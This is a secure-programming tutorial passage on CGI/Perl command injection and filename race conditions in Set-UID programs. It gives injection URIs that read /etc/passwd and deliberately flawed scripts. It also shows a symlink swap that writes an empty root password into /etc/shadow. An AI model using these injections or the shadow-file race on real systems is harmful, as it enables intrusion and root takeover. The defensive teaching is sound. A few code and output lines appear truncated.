The previous finger.cgi script avoids problems with some strange characters. Thus, the URI finger.cgi?login=kmaster;cat%20/etc/passwd doesn’t work, because the semicolon is escaped. However, one character is not protected: the backslash ‘\’.

Let’s take, for instance, a script that prevents us from going up the tree by using the regular expression s/\.\.//g to get rid of “..”. It doesn’t matter! Shells can manage any number of ‘/’ in a row (just try cat ///etc//////passwd to convince yourself).

For example, in the above pipe2.cgi script, the $filename variable is initialized from the “/home/httpd/” prefix. Using the previous regular expression might seem sufficient to prevent going up through the directories. Of course, this expression protects against “..”, but what happens if we escape the ‘.’ character? The regular expression doesn’t match if the filename is .\./.\./etc/passwd. Note that this works very well with system() (or ` ... `), but fails with open() or “-e”.

Let’s go back to the finger.cgi script. Using the semicolon, the finger.cgi?login=kmaster;cat%20/etc/passwd URI doesn’t give the expected result since the semicolon is escaped by the regular expression. That is, the shell receives the instruction :

/usr/bin/finger kmaster\;cat /etc/passwd

The following errors are found in the web server logs :

finger: kmaster;cat: no such user.
finger: /etc/passwd: no such user.

These messages are identical to those you get when typing this line in a shell. The problem is that the shell treats the escaped ‘;’ as an ordinary character belonging to the string “kmaster;cat”.

We want to separate both instructions, the one from the script and the one we want to run. To do so, we put a backslash in front of the ‘;’ ourselves : finger.cgi?login=kmaster\;cat%20/etc/passwd. The script then changes the “\;” string into “\\;” and sends it to the shell, which reads :

/usr/bin/finger kmaster\\;cat /etc/passwd

The shell splits this into two different instructions :

  1. /usr/bin/finger kmaster\ which probably will fail… but we don’t care ;-)
  2. cat /etc/passwd which displays the password file.

The solution is simple : the backslash ‘\‘ must be escaped, too.

Using an unprotected ” character

Sometimes, the parameter is “protected” using quotes. We have changed the previous finger.cgi script to protect the $login variable that way.

However, if the quotes themselves are not escaped, this is useless, and adding one to your request is enough to defeat it. The first quote you send closes the opening quote from the script. Next comes your command, and then a second quote that pairs with the closing quote from the script.

The finger2.cgi script illustrates this :


print "<BODY>";
$login = $input{'login'};
$login =~ s///g;
$login =~ s/([<>\*\|`&\$!#\(\)\[\]\{\}:'\n])/\\$1/g;
print "Login $login<BR>\n";
print "Finger<BR>\n";
#New (in)efficient super protection :
$CMD= "/usr/bin/finger \"$login\"|";
open(FILE,"$CMD") || goto form;
while(<FILE>) {

The URI to execute the command then becomes :


The shell receives the command /usr/bin/finger "$login";cat /etc/passwd"" and the quotes are not a problem anymore.

So, it’s important, if you wish to protect the parameters with quotes, to escape them as for the semicolon or the backslash already mentioned.

Writing in Perl

Warning and tainting options

When programming in Perl, use the -w option or “use warnings;” (Perl 5.6.0 and later). It informs you about potential problems, such as uninitialized variables or obsolete expressions/functions.

The -T option (taint mode) provides higher security. This mode activates various tests. The most important concerns a possible tainting of variables. Variables are either clean or tainted. Data coming from outside the program is considered tainted as long as it hasn’t been cleaned up. A tainted variable cannot be used to set values that affect anything outside the program (for example, calls to shell commands).

In taint mode, the command line arguments, the environment variables, some system call results (readdir(), readlink(), …) and the data coming from files are considered suspicious and thus tainted.

To clean up a variable, you must filter it through a regular expression. Obviously, using .* is useless. The goal is to force you to take care of provided arguments. Always use a regular expression that is as specific as possible.

Nevertheless, this mode doesn’t protect from everything : the tainting of arguments passed to system() or exec() as a list variable is not checked. You must then be very careful if one of your scripts uses these functions. The exec "sh", '-c', $arg; instruction is considered as secure, whether $arg is tainted or not :(

It’s also recommended to add “use strict;” at the beginning of your programs. This forces you to declare variables; some people will find that annoying but it’s mandatory if you use mod_perl.

Thus, your Perl CGI scripts must begin with :

#!/usr/bin/perl -wT
use strict;
use CGI;

or, with Perl 5.6.0 and later :

#!/usr/bin/perl -T
use warnings;
use strict;
use CGI;

Call to open()

Many programmers open a file simply using open(FILE,"$filename") || .... We already saw the risks of such code. To reduce the risk, specify the open mode :

  • open(FILE,"<$filename") || ... for read only;
  • open(FILE,">$filename") || ... for write only

Don’t open your files in an unspecified way.

Before accessing a file, it’s recommended to check if the file exists. This doesn’t prevent the race conditions types of problems presented in the previous article, but avoids some traps such as commands with arguments.

if ( -e $filename ) { ... }

Starting from Perl 5.6, there’s a new syntax for open() : open(FILEHANDLE,MODE,LIST). With the ‘<‘ mode, the file is open for reading; with the ‘>’ mode, the file is truncated or created if needed, and open for writing. This becomes interesting for modes communicating with other processes. If the mode is ‘|-‘ or ‘-|’, the LIST argument is interpreted as a command and is respectively found before or after the pipe.

Before Perl 5.6 and open() with three arguments, some people used the sysopen() command.

Input escaping and filtering

There are two methods : either you specify the forbidden characters, or you explicitly define the allowed characters using regular expressions. The example programs should have convinced you that it’s quite easy to forget to filter potentially dangerous characters. That’s why the second method is recommended.

Practically, here is what to do : first, check the request only holds allowed characters. Next, escape the characters considered as dangerous among the allowed ones.

#!/usr/bin/perl -wT


#  The $safe and $danger variables respectively define
#  the characters without risk and the risky ones.
#  Add or remove some to change the filter.
#  Only $input containing characters included in the
#  definitions are valid.

use strict;

my $input = shift;

my $safe = '\w\d';
my $danger = '&`\'\\|"*?~<>^(){}\$\n\r\[\]';
#  '/', space and tab are not part of the definitions on purpose

if ($input =~ m/^[$safe$danger]+$/) {
    # Escape each dangerous character individually
    $input =~ s/([$danger])/\\$1/g;
} else {
    die "Bad input chars in $input\n";
}
print "input = [$input]\n";

This script defines two character sets :

  • $safe contains the ones considered as not risky (here, only numbers and letters);
  • $danger contains the characters to be escaped since they are allowed but potentially dangerous.

Every request containing a character not present in one of the two sets is immediately rejected.

PHP scripts

I don’t want to be controversial, but I think it’s better to write scripts in PHP rather than in Perl. More exactly, as a system administrator, I prefer my users to write scripts in PHP rather than in Perl. Someone programming insecurely in PHP will be as dangerous as in Perl, so why prefer PHP ? If you have some programming problems with PHP, you can activate the Safe mode (safe_mode=on) or deactivate functions (disable_functions=...). Safe mode prevents accessing files not belonging to the user, changing environment variables unless explicitly allowed, executing commands, etc.

By default, the Apache banner informs us about the PHP being used.

$ telnet localhost 80
Connected to localhost.localdomain.
Escape character is '^]'.

HTTP/1.1 200 OK
Date: Tue, 03 Apr 2001 11:22:41 GMT
Server: Apache/1.3.14 (Unix)  (Red-Hat/Linux) mod_ssl/2.7.1
        OpenSSL/0.9.5a PHP/4.0.4pl1 mod_perl/1.24
Connection: close
Content-Type: text/html

Connection closed by foreign host.

Write expose_php = Off into /etc/php.ini to hide the information :

Server: Apache/1.3.14 (Unix)  (Red-Hat/Linux) mod_ssl/2.7.1
OpenSSL/0.9.5a mod_perl/1.24

The /etc/php.ini file (PHP4) and /etc/httpd/php3.ini have many parameters that can help harden the system. For instance, the “magic_quotes_gpc” option escapes the quotes (by placing a backslash in front of them) in the arguments received by the GET and POST methods and via cookies; this avoids a number of problems found in our Perl examples.


This article is probably the most easily understood among the articles in this series. It shows vulnerabilities exploited every day on the web. There are many others, often related to bad programming (for instance, a script sending a mail, taking the From: field as an argument, provides a good site for spamming). Examples are too numerous. As soon as a script is on a web site, you can bet at least one person will try to use it the wrong way.

This article ends the series about secure programming. We hope we helped you discover the main security holes found in too many applications, and that you will take into account the “security” parameter when designing and programming your applications. Security problems are often neglected because of the limited scope of the development (internal use, private network use, temporary model, etc.). Nevertheless, a module originally designed for only very restricted use can become the base for a much bigger application and then changes later on will be much more expensive.

Some URI Encoded characters

URI Encoding (ISO 8859-1)    Character
%00                          \0 (end of string)
%0a                          \n (line feed)
%20                          space
%21                          !
%23                          #
%26                          & (ampersand)
%2f                          /
%3b                          ;
%3c                          <
%3e                          >
Tab 1 : ISO 8859-1 and character correspondence


The faulty guestbook.cgi program

#!/usr/bin/perl -w

# guestbook.cgi

BEGIN { $ENV{PATH} = '/usr/bin:/bin' }
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};   # Make %ENV safer =:-)
print "Content-type: text/html\n\n";
print "<HTML>\n<HEAD><TITLE>Buggy Guestbook</TITLE></HEAD>\n";
&ReadParse(\%input);
my $email= $input{email};
my $texte= $input{texte};
$texte =~ s/\n/<BR>/g;

print "<BODY><A HREF=\"guestbook.html\">
       GuestBook </A><BR><form action=\"$ENV{'SCRIPT_NAME'}\">\n
      Email: <input type=texte name=email><BR>\n
      Texte:<BR>\n<textarea name=\"texte\" rows=15 cols=70>
      </textarea><BR><input type=submit value=\"Go!\">
      </form>\n";
print "</BODY>\n";
print "</HTML>";
# The form values are appended to the page without any filtering
open (FILE,">>guestbook.html") || die ("Cannot write\n");
print FILE "Email: $email<BR>\n";
print FILE "Texte: $texte<BR>\n";
print FILE "<HR>\n";
close(FILE);
exit(0);

sub ReadParse {
  my $in =shift;
  my ($i, $key, $val);
  my $in_first;
  my @in_second;

  # Read in text
  if ($ENV{'REQUEST_METHOD'} eq "GET") {
    $in_first = $ENV{'QUERY_STRING'};
  } elsif ($ENV{'REQUEST_METHOD'} eq "POST") {
    read(STDIN,$in_first,$ENV{'CONTENT_LENGTH'});
  } else {
    die "ERROR: unknown request method\n";
  }

  @in_second = split(/&/,$in_first);

  foreach $i (0 .. $#in_second) {
    # Convert plus's to spaces
    $in_second[$i] =~ s/\+/ /g;

    # Split into key and value.
    ($key, $val) = split(/=/,$in_second[$i],2);

    # Convert %XX from hex numbers to alphanumeric
    $key =~ s/%(..)/pack("c",hex($1))/ge;
    $val =~ s/%(..)/pack("c",hex($1))/ge;

    # Associate key and value
    $$in{$key} .= "" if (defined($$in{$key}));
    $$in{$key} .= $val;
  }

  return length($#in_second);
}

Avoiding security holes when developing an application – Part 5: race conditions


The general principle defining race conditions is the following : a process wants to access a system resource exclusively. It checks that the resource is not already used by another process, then uses it as it pleases. The race condition occurs when another process tries to use the same resource in the time-lag between the first process checking that resource and actually taking it over. The side effects may vary. The classical case in OS theory is the deadlock of both processes. More often it leads to application malfunction or even to security holes when a process wrongfully benefits from the privileges of another.

What we previously called a resource can take different forms. The best-known race conditions are those discovered and corrected in the Linux kernel itself, caused by concurrent access to memory areas. Here, we will focus on system applications and we’ll deem that the concerned resources are filesystem nodes. This concerns not only regular files but also direct access to devices through special entry points from the /dev/ directory.

Most of the time, an attack aiming to compromise system security is done against Set-UID applications since the attacker can benefit from the privileges of the owner of the executable file. However, unlike previously discussed security holes (buffer overflow, format strings…), race conditions usually don’t allow the execution of “customized” code. Rather, they benefit from the resources of a program while it’s running. This type of attack is also aimed at “normal” utilities (not Set-UID), the cracker lying in ambush for another user, especially root, to run the concerned application and access its resources. This is also true for writing to a file (e.g. ~/.rhosts, in which the string “+ +” provides direct access from any machine without a password), or for reading a confidential file (sensitive commercial data, personal medical information, password file, private key…).

Unlike the security holes discussed in our previous articles, this security problem applies to every application and not just to Set-UID utilities and system servers or daemons.

First example

Let’s have a look at the behavior of a Set-UID program that needs to save data in a file belonging to the user. We could, for instance, consider the case of a mail transport software like sendmail. Let’s suppose the user can both provide a backup filename and a message to write into that file, which is plausible under some circumstances. The application must then check if the file belongs to the person who started the program. It also will check that the file is not a symlink to a system file. Let’s not forget, the program being Set-UID root, it is allowed to modify any file on the machine. Accordingly, it will compare the file’s owner to its own real UID. Let’s write something like :

1     /* ex_01.c */
2     #include <stdio.h>
3     #include <stdlib.h>
4     #include <unistd.h>
5     #include <sys/stat.h>
6     #include <sys/types.h>
8     int
9     main (int argc, char * argv [])
10    {
11        struct stat st;
12        FILE * fp;
14        if (argc != 3) {
15            fprintf (stderr, "usage : %s file message\n", argv [0]);
16            exit(EXIT_FAILURE);
17        }
18        if (stat (argv [1], & st) < 0) {
19            fprintf (stderr, "can't find %s\n", argv [1]);
20            exit(EXIT_FAILURE);
21        }
22        if (st . st_uid != getuid ()) {
23            fprintf (stderr, "not the owner of %s \n", argv [1]);
24            exit(EXIT_FAILURE);
25        }
26        if (! S_ISREG (st . st_mode)) {
27            fprintf (stderr, "%s is not a normal file\n", argv[1]);
28            exit(EXIT_FAILURE);
29        }
31        if ((fp = fopen (argv [1], "w")) == NULL) {
32            fprintf (stderr, "Can't open\n");
33            exit(EXIT_FAILURE);
34        }
35        fprintf (fp, "%s\n", argv [2]);
36        fclose (fp);
37        fprintf (stderr, "Write Ok\n");
38        exit(EXIT_SUCCESS);
39    }

As we explained in our first article, it would be better for a Set-UID application to temporarily drop its privileges and open the file using the real UID of the user who called it. As a matter of fact, the above situation corresponds rather to a daemon providing services to every user. Always running under the root ID, it would check against the UID of the requesting user instead of its own real UID. Nevertheless, we’ll keep this scheme for now, even if it isn’t that realistic, since it allows us to understand the problem while easily “exploiting” the security hole.

As we can see, the program starts doing all the needed checks, i.e. that the file exists, that it belongs to the user and that it’s a normal file. Next, it actually opens the file and writes the message. That is where the security hole lies! Or, more exactly, it’s within the lapse of time between the reading of the file attributes with stat() and its opening with fopen(). This lapse of time is often extremely short but an attacker can benefit from it to change the file’s characteristics. To make our attack even easier, let’s add a line that causes the process to sleep between the two operations, thus having the time to do the job by hand. Let’s change the line 30 (previously empty) and insert :

30        sleep (20);

Now, let’s try it out. First, let’s make the application Set-UID root. It is very important to make a backup copy of our password file /etc/shadow beforehand :

$ cc ex_01.c -Wall -o ex_01
$ su
# cp /etc/shadow /etc/shadow.bak
# chown root.root ex_01
# chmod +s ex_01
# exit
$ ls -l ex_01
-rwsrwsr-x 1 root  root    15454 Jan 30 14:14 ex_01

Everything is ready for the attack. We are in a directory belonging to us. We have a Set-UID root utility (here ex_01) holding a security hole, and we feel like replacing the line concerning root from the /etc/shadow password file with a line containing an empty password.

First, we create a fic file belonging to us :

$ rm -f fic
$ touch fic

Next, we run our application in the background “to keep the lead”. We ask it to write a string into that file. It checks what it has to, sleeps for a while before really accessing the file.

$ ./ex_01 fic "root::1:99999:::::" &
[1] 4426

The content of the root line comes from the shadow(5) man page, the most important being the empty second field (no password). While the process is asleep, we have about 20 seconds to remove the fic file and replace it with a link (symbolic or physical, both work) to the /etc/shadow file. Let’s remember that every user can create a link to a file in a directory belonging to him, even if he can’t read the content (or in /tmp, as we’ll see a bit later). However, it isn’t possible to create a copy of such a file, since it would require a full read.

$ rm -f fic
$ ln -s /etc/shadow ./fic

Then we ask the shell to bring the ex_01 process back to the foreground with the fg command, and wait till it finishes :

$ fg
./ex_01 fic "root::1:99999:::::"
Write Ok

Voilà ! It’s over, the /etc/shadow file only holds one line indicating root has no password. You don’t believe it ?

$ su
# whoami
# cat /etc/shadow

Let’s finish our experiment by putting the old password file back :

# cp /etc/shadow.bak /etc/shadow
cp: replace `/etc/shadow'? y

Let’s be more realistic

We succeeded in exploiting a race condition in a Set-UID root utility. Of course, this program was very “helpful” waiting for 20 seconds giving us time to modify the files behind its back. Within a real application, the race condition only applies for a very short time. How do we take advantage of that ?

Usually, the cracker relies on a brute force attack, renewing the attempts hundreds, thousands or ten thousand times, using scripts to automate the sequence. It’s possible to improve the chance of “falling” into the security hole with various tricks aiming at increasing the lapse of time between the two operations that the program wrongly considers as atomically linked. The idea is to slow down the target process to manage the delay preceding the file modification more easily. Different approaches can help us to reach our goal :

  • To reduce the priority of the attacked process as much as possible by running it with the nice -n 20 prefix;
  • To increase the system load, running various processes that do CPU time consuming loops (like while (1););
  • The kernel doesn’t allow debugging Set-UID programs, but it’s possible to force a pseudo step-by-step execution by sending sequences of SIGSTOP and SIGCONT signals, which temporarily freeze the process (like the Ctrl-Z key combination in a shell) and then restart it when needed.

The method allowing us to benefit from a security hole based in race condition is boring and repetitive, but it really is usable ! Let’s try to find the most effective solutions.

Possible improvement

The problem discussed above relies on the ability to change an object’s characteristics during the time-lapse between two operations, the whole thing being as continuous as possible. In the previous situation, the change did not concern the file itself. By the way, as a normal user it would have been quite difficult to modify, or even to read, the /etc/shadow file. As a matter of fact, the change relies on the link between the existing file node in the name tree and the file itself as a physical entity. Let’s remember most of the system commands (rm, mv, ln, etc.) act on the file name not on the file content. Even when you delete a file (using rm and the unlink() system call), the content is really deleted when the last physical link – the last reference – is removed.

The mistake made in the previous program is considering the association between the name of the file and its content as unchangeable, or at least constant, during the lapse of time between stat() and fopen() operation. Thus, the example of a physical link should suffice to verify that this association is not a permanent one at all. Let’s take an example using this type of link. In a directory belonging to us, we create a new link to a system file. Of course, the file’s owner and the access mode are kept. The ln command -f option forces the creation, even if that name already exists :

$ ln -f /etc/fstab ./myfile
$ ls -il /etc/fstab myfile
8570 -rw-r--r--   2 root  root  716 Jan 25 19:07 /etc/fstab
8570 -rw-r--r--   2 root  root  716 Jan 25 19:07 myfile
$ cat myfile
/dev/hda5   /                 ext2    defaults,mand   1 1
/dev/hda6   swap              swap    defaults        0 0
/dev/fd0    /mnt/floppy       vfat    noauto,user     0 0
/dev/hdc    /mnt/cdrom        iso9660 noauto,ro,user  0 0
/dev/hda1   /mnt/dos          vfat    noauto,user     0 0
/dev/hda7   /mnt/audio        vfat    noauto,user     0 0
/dev/hda8   /home/ccb/annexe  ext2    noauto,user     0 0
none        /dev/pts          devpts  gid=5,mode=620  0 0
none        /proc             proc    defaults        0 0
$ ln -f /etc/host.conf ./myfile
$ ls -il /etc/host.conf myfile 
8198 -rw-r--r--   2 root  root   26 Mar 11  2000 /etc/host.conf
8198 -rw-r--r--   2 root  root   26 Mar 11  2000 myfile
$ cat myfile
order hosts,bind
multi on

The -i option of /bin/ls displays the inode number at the beginning of the line. We can see that the same name points, in turn, to two different physical inodes.

In fact, we would like the functions that check and access the file to always point to the same content and the same inode. And it’s possible ! The kernel itself automatically manages this association when it provides us with a file descriptor. When we open a file for reading, the open() system call returns an integer value, the descriptor, which an internal table associates with the physical file. All the reading we do next will concern this file’s content, no matter what happens to the name used during the open operation.

Let’s emphasize that point : once a file has been opened, every operation on the filename, including removing it, will have no effect on the file content. As long as there is still a process holding a descriptor for a file, the file content isn’t removed from the disk, even if its name disappears from the directory where it was stored. The kernel maintains the association to the file content from the open() system call providing a file descriptor until this descriptor is released by close() or by the end of the process.

So there we have our solution ! We can open the file first and then check the permissions by examining the characteristics of the descriptor instead of those of the filename. This is done using the fstat() system call, which works like stat() but checks a file descriptor rather than a path. To access the content of the file through the descriptor, we’ll use the fdopen() function, which works like fopen() but relies on a descriptor rather than on a filename. Thus, the program becomes :

1    /* ex_02.c */
2    #include <fcntl.h>
3    #include <stdio.h>
4    #include <stdlib.h>
5    #include <unistd.h>
6    #include <sys/stat.h>
7    #include <sys/types.h>
9     int
10    main (int argc, char * argv [])
11    {
12        struct stat st;
13        int fd;
14        FILE * fp;
16        if (argc != 3) {
17            fprintf (stderr, "usage : %s file message\n", argv [0]);
18            exit(EXIT_FAILURE);
19        }
20        if ((fd = open (argv [1], O_WRONLY, 0)) < 0) {
21            fprintf (stderr, "Can't open %s\n", argv [1]);
22            exit(EXIT_FAILURE);
23        }
24        fstat (fd, & st);
25        if (st . st_uid != getuid ()) {
26            fprintf (stderr, "%s not owner !\n", argv [1]);
27            exit(EXIT_FAILURE);
28        }
29        if (! S_ISREG (st . st_mode)) {
30            fprintf (stderr, "%s not a normal file\n", argv[1]);
31            exit(EXIT_FAILURE);
32        }
33        if ((fp = fdopen (fd, "w")) == NULL) {
34            fprintf (stderr, "Can't open\n");
35            exit(EXIT_FAILURE);
36        }
37        fprintf (fp, "%s", argv [2]);
38        fclose (fp);
39        fprintf (stderr, "Write Ok\n");
40        exit(EXIT_SUCCESS);
41    }

This time, after line 20, no change to the filename (deleting, renaming, linking) will affect our program’s behavior; the content of the original physical file will be kept.


When manipulating a file it’s important to ensure the association between the internal representation and the real content stays constant. Preferably, we’ll use the following system calls to manipulate the physical file as an already open descriptor rather than their equivalents using the path to the file :

System call                               Use
fchdir (int fd)                           Goes to the directory represented by fd.
fchmod (int fd, mode_t mode)              Changes the file access rights.
fchown (int fd, uid_t uid, gid_t gid)     Changes the file owner.
fstat (int fd, struct stat * st)          Consults the information stored within the inode of the physical file.
ftruncate (int fd, off_t length)          Truncates an existing file.
fdopen (int fd, const char * mode)        Initializes IO from an already open descriptor. It’s an stdio library routine, not a system call.

Then, of course, you must open the file in the wanted mode, calling open() (don’t forget the third argument when creating a new file). More on open() later when we discuss the temporary file problem.

We must insist on the importance of checking the return codes of system calls. For instance, let’s mention, even if it has nothing to do with race conditions, a problem found in old /bin/login implementations that neglected an error code check. This application automatically provided root access when it could not find the /etc/passwd file. This behavior can seem acceptable when a damaged file system has to be repaired. On the other hand, checking that it was impossible to open the file, instead of checking that the file really did not exist, was less acceptable. Calling /bin/login after opening the maximum number of allowed descriptors gave any user root access… Let’s finish this digression by insisting on how important it is to check not only the success or failure of a system call, but also the error code, before taking any action that affects system security.

Race conditions to the file content

A program dealing with system security shouldn’t rely on having exclusive access to a file’s content. More exactly, it’s important to properly manage the risks of race conditions on the same file. The main danger comes from a user running multiple instances of a Set-UID root application simultaneously, or establishing multiple connections at once with the same daemon, hoping to create a race condition during which the content of a system file could be modified in an unusual way.

To avoid a program being sensitive to this kind of situation, it’s necessary to institute an exclusive access mechanism to the file data. This is the same problem as the one found in databases when various users are allowed to simultaneously query or change the content of a file. The principle of file locking solves this problem.

When a process wants to write into a file, it asks the kernel to lock that file – or a part of it. As long as the process keeps the lock, no other process can ask to lock the same file, or at least the same part of the file. In the same way, a process asks for a lock before reading the file content to ensure no changes will be made while it holds the lock.

As a matter of fact, the system is more clever than that : the kernel distinguishes between the locks required for file reading and those for file writing. Various processes can hold a lock for reading simultaneously since no one will attempt to change the file content. However, only one process can hold a lock for writing at a given time, and no other lock can be provided at the same time, even for reading.

There are two types of locks (mostly incompatible with each other). The first one comes from BSD and relies on the flock() system call. Its first argument is the descriptor of the file you wish to access in an exclusive way, and the second one is a symbolic constant representing the operation to be done. It can have different values : LOCK_SH (lock for reading), LOCK_EX (lock for writing), LOCK_UN (release of the lock). The system call blocks as long as the requested operation remains impossible. However, you can combine the operation with the LOCK_NB constant, using a binary OR |, for the call to fail instead of blocking.

The second type of lock comes from System V, and relies on the fcntl() system call, whose invocation is a bit complicated. There’s a library function called lockf(), close to the system call but not as fast. The first argument of fcntl() is the descriptor of the file to lock. The second one represents the operation to be performed : F_SETLK and F_SETLKW set a lock; the second command blocks until the operation becomes possible, while the first returns immediately in case of failure. F_GETLK consults the lock state of a file (which is useless for current applications). The third argument is a pointer to a variable of struct flock type, describing the lock. The important members of the flock structure are the following :

Name       Type    Meaning
l_type     short   Expected action : F_RDLCK (to lock for reading), F_WRLCK (to lock for writing) and F_UNLCK (to release the lock).
l_whence   short   Origin of the l_start field (usually SEEK_SET).
l_start    off_t   Position of the beginning of the lock (usually 0).
l_len      off_t   Length of the lock, 0 to reach the end of the file.

We can see that fcntl() can lock limited portions of a file, and that it can do much more than flock(). Let’s have a look at a small program that asks for a write lock on the files whose names are given as arguments, and waits for the user to press the Enter key before finishing (and thus releasing the locks).

/* ex_03.c */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

int
main (int argc, char * argv [])
{
  int i;
  int fd;
  char buffer [2];
  struct flock lock;

  for (i = 1; i < argc; i ++) {
    fd = open (argv [i], O_RDWR | O_CREAT, 0644);
    if (fd < 0) {
      fprintf (stderr, "Can't open %s\n", argv [i]);
      exit(EXIT_FAILURE);
    }
    lock . l_type = F_WRLCK;
    lock . l_whence = SEEK_SET;
    lock . l_start = 0;
    lock . l_len = 0;
    if (fcntl (fd, F_SETLK, & lock) < 0) {
      fprintf (stderr, "Can't lock %s\n", argv [i]);
      exit(EXIT_FAILURE);
    }
  }
  fprintf (stdout, "Press Enter to release the lock(s)\n");
  fgets (buffer, 2, stdin);
  exit(EXIT_SUCCESS);
}

We first launch this program from a first console where it waits :

$ cc -Wall ex_03.c -o ex_03
$ ./ex_03 myfile
Press Enter to release the lock(s)

From another terminal…

    $ ./ex_03 myfile
    Can't lock myfile

Pressing Enter in the first console, we release the locks.

With this locking mechanism, you can prevent race conditions on directories and print queues, as the lpd daemon does with a flock() lock on the /var/lock/subsys/lpd file, thus allowing only one instance. You can also manage access to a system file like /etc/passwd in a secure way; it is locked using fcntl() from the pam library when changing a user’s data.

However, this only protects against interference from well-behaved applications, that is, applications asking the kernel to reserve the proper access before reading or writing an important system file. This is called a cooperative lock: responsibility for proper data access rests with each application. Unfortunately, a badly written program is able to replace the file content even if another, well-behaved process holds a write lock. Here is an example. We write a few letters into a file and lock it using the previous program :

$ echo "FIRST" > myfile
$ ./ex_03 myfile
Press Enter to release the lock(s)

From another console, we can change the file :

    $ echo "SECOND" > myfile

Back to the first console, we check the “damages” :

$ cat myfile
SECOND

To solve this problem, the Linux kernel provides the sysadmin with a locking mechanism inherited from System V. As a consequence, you can only use it with fcntl() locks and not with flock(). The administrator can tell the kernel that the fcntl() locks on a file are strict, using a particular combination of access rights. Then, if a process locks the file for writing, another process won’t be able to write into that file (even as root). The particular combination is to set the Set-GID bit while removing the execution bit for the group. This is obtained with the command :

$ chmod g+s-x myfile

However, this is not enough. For a file to benefit automatically from strict locks, the mandatory attribute must be activated on the partition holding it. Usually, you either edit the /etc/fstab file to add the mand option in the 4th column, or remount the partition from the command line :

# mount
/dev/hda5 on / type ext2 (rw)
# mount / -o remount,mand
# mount
/dev/hda5 on / type ext2 (rw,mand)

Now, we can check that a change from another console is impossible :

$ ./ex_03 myfile
Press Enter to release the lock(s)

From another terminal :

    $ echo "THIRD" > myfile
    bash: myfile: Resource temporarily not available

And back to the first console :

$ cat myfile

It is the administrator, not the programmer, who decides to make file locks strict (for instance on /etc/passwd or /etc/shadow). The programmer has to control the way data is accessed, which ensures that the application handles data consistently when reading and is not dangerous to other processes when writing, as long as the environment is properly administered.

Temporary files

Very often a program needs to temporarily store data in an external file. The most usual case is inserting a record in the middle of a sequentially ordered file, which implies copying the original file into a temporary file while adding the new information. Next, the unlink() system call removes the original file and rename() renames the temporary file to replace the previous one.
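A minimal sketch of this copy-then-rename pattern is given here. It is a variation rather than the exact sequence described above: since rename() replaces an existing target atomically, the unlink() step is left out. The helper name replace_file() and the ".replace.XXXXXX" template are hypothetical, and the temporary file is created with mkstemp(), which is discussed later in this article.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/*
 * Replace the content of `path` with `len` bytes taken from `data`.
 * The new content is first written to a temporary file created by
 * mkstemp() in `dir` (assumed to be on the same filesystem as `path`),
 * then rename() puts it in place.
 * Returns 0 on success, -1 on error.
 */
int replace_file(const char *dir, const char *path,
                 const char *data, size_t len)
{
    char tmp_path[4096];
    size_t done = 0;
    int fd;
    int n = snprintf(tmp_path, sizeof tmp_path, "%s/.replace.XXXXXX", dir);

    if (n < 0 || (size_t) n >= sizeof tmp_path)
        return -1;

    fd = mkstemp(tmp_path);   /* fills in the XXXXXX and opens the file */
    if (fd == -1)
        return -1;

    while (done < len) {
        ssize_t w = write(fd, data + done, len - done);
        if (w < 0) {
            close(fd);
            unlink(tmp_path);
            return -1;
        }
        done += (size_t) w;
    }
    if (close(fd) == -1 || rename(tmp_path, path) == -1) {
        unlink(tmp_path);
        return -1;
    }
    return 0;
}
```

Readers of `path` see either the old content or the new one, never a half-written file.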

Opening a temporary file, if not done properly, is often the starting point of race condition situations for an ill-intentioned user. Security holes based on the temporary files have been recently discovered in applications such as Apache, Linuxconf, getty_ps, wu-ftpd, rdist, gpm, inn, etc. Let’s remember a few principles to avoid this sort of trouble.

Usually, temporary file creation is done in the /tmp directory. This allows the sysadmin to know where short-term data is stored, and makes it possible to schedule a periodic cleanup (using cron), to use an independent partition formatted at boot time, etc. Usually, the administrator defines the location reserved for temporary files in the <paths.h> and <stdio.h> files, through the _PATH_TMP and P_tmpdir symbolic constants. As a matter of fact, using a default directory other than /tmp is not a good idea, since it would imply recompiling every application, including the C library. However, the behavior of the GlibC routines can be adjusted with the TMPDIR environment variable. Thus, a user can ask for temporary files to be stored in a directory belonging to him rather than in /tmp. This is sometimes necessary when the partition dedicated to /tmp is too small to run applications requiring a large amount of temporary storage.

The /tmp system directory is something special because of its access rights :

$ ls -ld /tmp
drwxrwxrwt 7 root  root    31744 Feb 14 09:47 /tmp

The sticky bit, represented by the letter t at the end or by the 01000 octal mode, has a particular meaning when applied to a directory : only the directory owner (root) and the owner of a file found in that directory are able to delete the file. Since the directory is writable by everyone, each user can put his files in it, being sure they are protected, at least till the next cleanup managed by the sysadmin.

Nevertheless, using the temporary storage directory may cause a few problems. Let’s start with the trivial case, a Set-UID root application talking to a user. Take a mail transport program. If this process receives a signal asking it to finish immediately, for instance SIGTERM or SIGQUIT during a system shutdown, it can try to save on the fly the mail already written but not sent. With old versions, this was done in /tmp/dead.letter. The user then just had to create (since he can write into /tmp) a hard link to /etc/passwd named dead.letter for the mailer (running with effective UID root) to write the content of the unfinished mail to this file (incidentally containing a line “root::1:99999:::::”).

The first problem with this behavior is the predictable nature of the filename. You only have to watch such an application once to deduce that it will use the /tmp/dead.letter file name. Therefore, the first step is to use a filename specific to the current program instance. There are various library functions able to provide us with a personal temporary filename.

Let’s suppose we have such a function providing a unique name for our temporary file. Since free software comes with its source code (and so does the C library), the filename remains predictable, even if predicting it is rather difficult. An attacker could create a symlink with the name provided by the C library. Our first reaction is to check whether the file exists before opening it. Naively, we could write something like :

  /* naive check, deliberately wrong: the two open() calls are not atomic */
  if ((fd = open (filename, O_RDWR)) != -1) {
    fprintf (stderr, "%s already exists\n", filename);
    exit (EXIT_FAILURE);
  }
  fd = open (filename, O_RDWR | O_CREAT, 0644);

Obviously, this is a typical race condition: a security hole opens if a user succeeds in creating a link to /etc/passwd between the first open() and the second one. These two operations have to be done atomically, with no manipulation able to take place between them. This is possible using a specific option of the open() system call. Called O_EXCL and used in conjunction with O_CREAT, this option makes open() fail if the file already exists, and the existence check is atomically tied to the creation.

By the way, the ‘x’ GNU extension to the opening modes of the fopen() function requests an exclusive file creation, failing if the file already exists :

  FILE * fp;

  /* "w+x": create for reading and writing, fail if the file exists */
  if ((fp = fopen (filename, "w+x")) == NULL) {
    perror ("Can't create the file.");
    exit (EXIT_FAILURE);
  }

